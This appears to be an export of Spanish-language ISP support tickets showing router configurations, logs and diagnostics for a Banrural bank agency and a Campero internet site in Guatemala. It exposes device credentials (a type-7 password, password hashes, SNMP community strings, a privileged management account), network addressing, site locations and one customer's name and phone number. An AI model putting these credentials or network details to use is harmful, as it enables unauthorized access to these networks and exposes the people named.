CC_BANRURAL_GT_AGENCIA_0488#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 2888 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.1
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0488
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$EBZG$52QQSPO.VCVLPCJIFAQWW1
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
IP SOURCE-ROUTE
IP CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX1539004G
!
!
USERNAME GESTIONIP PASSWORD 7 13261B13195C
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.189 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8901158T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.16.188.254 255.255.255.128
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.134.88.9 255.255.255.248 SECONDARY
 IP ADDRESS 10.134.88.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.164.88.126 255.255.255.0
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.16.188.129
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
NO CDP RUN
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION CANTSN CENTRAL, MERCADO MUNICIPAL LOCALES 1, 2, Y 3 FRENTE A LA MUNICIPALIDAD CHUARRANCHO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END
CC_BANRURAL_GT_AGENCIA_0488#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 13 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 13 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 17 MESSAGE LINES LOGGED
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.355: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
MAY 25 04:13:23.743: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 25 04:13:23.743: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 25 04:13:24.951: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
MAY 25 04:13:24.951: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 25 04:13:26.027 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
MAY 25 04:13:26.887 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
MAY 25 04:13:27.915 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 25 04:13:28.627 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 14-JUN-11 17:44 BY PROD_REL_TEAM
MAY 25 04:13:28.811 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0488 IS UNDERGOING A COLD START
MAY 25 04:13:29.431 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
MAY 25 04:13:29.431 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 25 04:13:31.431 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
CC_BANRURAL_GT_AGENCIA_0488#
SHOW CLOCK
04:20:24.623 UTC WED MAY 25 2022
CC_BANRURAL_GT_AGENCIA_0488#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.16.188.129           0   B443.2673.0FBE  ARPA   GIGABITETHERNET0/0
INTERNET  10.16.188.254           -   7081.05D7.7760  ARPA   GIGABITETHERNET0/0
INTERNET  10.134.88.9             -   7081.05D7.7761  ARPA   GIGABITETHERNET0/1
INTERNET  10.134.88.17            -   7081.05D7.7761  ARPA   GIGABITETHERNET0/1
INTERNET  10.134.88.22            0   F08E.DB17.9C62  ARPA   GIGABITETHERNET0/1
INTERNET  10.164.88.126           -   7081.05D7.7761  ARPA   GIGABITETHERNET0/1
CC_BANRURAL_GT_AGENCIA_0488#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8901158T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_BANRURAL_GT_AGENCIA_0488#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.16.188.254   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.164.88.126   YES NVRAM  UP                    UP
LOOPBACK5                  10.212.120.189  YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0488#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.16.188.254
  PING 10.16.188.254: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.16.188.254 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.13
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.16.188.254
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.16.188.254/32  DIRECT  0    0                 0.0.0.0         VLANIF184</t>
  </si>
  <si>
    <t>F4576410</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER REYES AL 45787911 NO RESPONDE,  SE INTENTARA LUEGO **
2001054280
**</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO NO SE TIENEN ALARMAS EN EL SERVICIO OPERATIVO SIN PERDIDAS NI CAIDAS NO SE TIENE NINUN LOG RESICENTE SE PORCEDE A  ENVIAR CORREO DE VALIDACIONE AL CLIENTE
ROUTER CPE ACTIVO HACE 1 DÍA/S, 16 HORA/S Y 8 MINUTOS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR100 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR109W ROUTER UPTIME IS 0 WEEK, 1 DAY, 16 HOURS, 9 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 1 DAY, 16 HOURS, 8 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR109W
4. BOOTROM  VERSION  : 1
&lt;CC_CAMPERO_GT_INTERNET_C667&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R009C00SPC500]
#
 SYSNAME CC_CAMPERO_GT_INTERNET_C667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ACL NAME NAT_1 2999
 RULE 5 PERMIT
#
ACL NUMBER 3001
 DESCRIPTION NAT POO
 RULE 10 PERMIT IP SOURCE 192.168.1.0 0.0.0.255
#
IKE PROPOSAL DEFAULT
 ENCRYPTION-ALGORITHM AES-256
 DH GROUP14
 AUTHENTICATION-ALGORITHM SHA2-256
 AUTHENTICATION-METHOD PRE-SHARE
 INTEGRITY-ALGORITHM HMAC-SHA2-256
 PRF HMAC-SHA2-256
#
FREE-RULE-TEMPLATE NAME DEFAULT_FREE_RULE
#
PORTAL-ACCESS-PROFILE NAME PORTAL_ACCESS_PROFILE
#
IP POOL 1
 GATEWAY-LIST 192.168.1.1
 NETWORK 192.168.1.0 MASK 255.255.255.0
 DNS-LIST 216.230.128.33 216.230.147.90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J:9"~-NC$7XUOS1#YW0K/!C/=RDW.;\*4H0.FPCZN59G(ZE=U$
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP FTP-DIRECTORY FLASH:/
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET SSH FTP
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
NAT ADDRESS-GROUP 1 181.209.244.245 181.209.244.246
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 5
 IP ADDRESS 181.209.244.245 255.255.255.252
 QOS CAR INBOUND CIR 5120 PIR 5120 CBS 1024000 PBS 2048000 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND CIR 5120 PIR 5120 CBS 1024000 PBS 2048000 GREEN PASS YELLOW PASS RED DISCARD
 DHCP SELECT INTERFACE
 DHCP SERVER DNS-LIST 216.230.147.90 8.8.8.8
#
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION LAN CLIENTE
#
INTERFACE GIGABITETHERNET0/0/1
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/2
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/38300528T/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 5
 TCP ADJUST-MSS 1200
 IP ADDRESS 10.105.1.19 255.255.255.224
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
 SHUTDOWN
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.181.110 255.255.255.255
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB03E0CC7A07C963
 SNMP-AGENT COMMUNITY READ %^%#G,+"CET&gt;+Z;]5%3(_YEWERAO%DL"QN&gt;Q;(DN&gt;)1DD&lt;'84VTQ)7]1LY:HQO!(QGT/R7F"KFO#H/RJLDYF%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION INTERNET_667, CENTRO COMERCIAL LA TRINIDAD RETALHULEU 14.5321833333, -91.6808 GUATEMALA
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 TELNET SERVER ENABLE
 TELNET SERVER PERMIT INTERFACE GIGABITETHERNET0/0/4
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 GIGABITETHERNET0/0/4 10.105.1.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667&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 407
JAN  5 2019 20:29:32+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[0]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JAN  5 2019 20:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[1]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 171 DAYS.
JAN  5 2019 19:41:23+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[2]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JAN  5 2019 19:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[3]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 171 DAYS.
JAN  5 2019 18:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[4]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 171 DAYS.
JAN  5 2019 18:14:20+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[5]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 18:11:47+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[6]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
JAN  5 2019 18:06:12+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[7]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 18:05:56+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[8]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
JAN  5 2019 17:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[9]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 171 DAYS.
JAN  5 2019 16:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[10]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 171 DAYS.
JAN  5 2019 15:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[11]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 15:08:54+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[12]:FAILED TO LOGIN. (IP=181.209.88.139, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 14:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[13]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 14:15:05+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[14]:FAILED TO LOGIN. (IP=1.246.113.52, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 13:24:10+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[15]:FAILED TO LOGIN. (IP=186.224.241.228, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 13:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[16]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 12:26:35+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[17]:LAST MESSAGE REPEATED 36 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 12:26:22+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[18]:FAILED TO LOGIN. (IP=187.252.227.94, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 12:26:22+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[19]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 12:26:20+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[20]:FAILED TO LOGIN. (IP=187.252.227.94, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 12:26:20+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[21]:LAST MESSAGE REPEATED 10 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 12:26:16+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[22]:FAILED TO LOGIN. (IP=80.217.145.134, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 12:26:12+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[23]:LAST MESSAGE REPEATED 13 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 12:26:05+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[24]:FAILED TO LOGIN. (IP=61.80.103.20, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 12:24:44+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[25]:FAILED TO LOGIN. (IP=187.252.227.94, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 12:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[26]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 11:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[27]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 10:44:58+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[28]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JAN  5 2019 10:33:35+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[29]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JAN  5 2019 10:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[30]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 10:14:34+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[31]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 10:14:26+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[32]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JAN  5 2019 09:25:17+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[33]:FAILED TO LOGIN. (IP=115.56.15.39, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 09:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[34]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 08:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[35]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 07:52:14+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[36]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JAN  5 2019 07:34:24+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[37]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3224911879, MODULENAME=LINE, INFOALIAS=LOGIN_FAIL)
JAN  5 2019 07:33:03+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[38]:FAILED TO LOGIN. (IP=178.141.231.28, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:32:44+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[39]:FAILED TO LOGIN. (IP=178.141.231.28, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:32:28+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[40]:FAILED TO LOGIN. (IP=178.141.231.28, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:32:09+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[41]:FAILED TO LOGIN. (IP=178.141.231.28, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:31:51+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[42]:FAILED TO LOGIN. (IP=178.141.231.28, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:31:33+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[43]:FAILED TO LOGIN. (IP=178.141.231.28, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:23:27+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01PKI/4/LOCAL_VALID(L)[44]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK5601435.HUAWEI.COM) WILL BE VALID IN 172 DAYS.
JAN  5 2019 07:10:14+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[45]:FAILED TO LOGIN. (IP=113.193.53.227, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:06:19+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01LINE/4/LOGIN_FAIL(S)[46]:FAILED TO LOGIN. (IP=172.245.186.189, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JAN  5 2019 07:04:51+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[47]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JAN  5 2019 07:04:26+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01NTP/4/PACKET_LENGTH_WRONG(L)[48]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JAN  5 2019 07:03:57+00:00 CC_CAMPERO_GT_INTERNET_C667 %%01INFO/4/SUPPRESS_LOG(L)[49]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
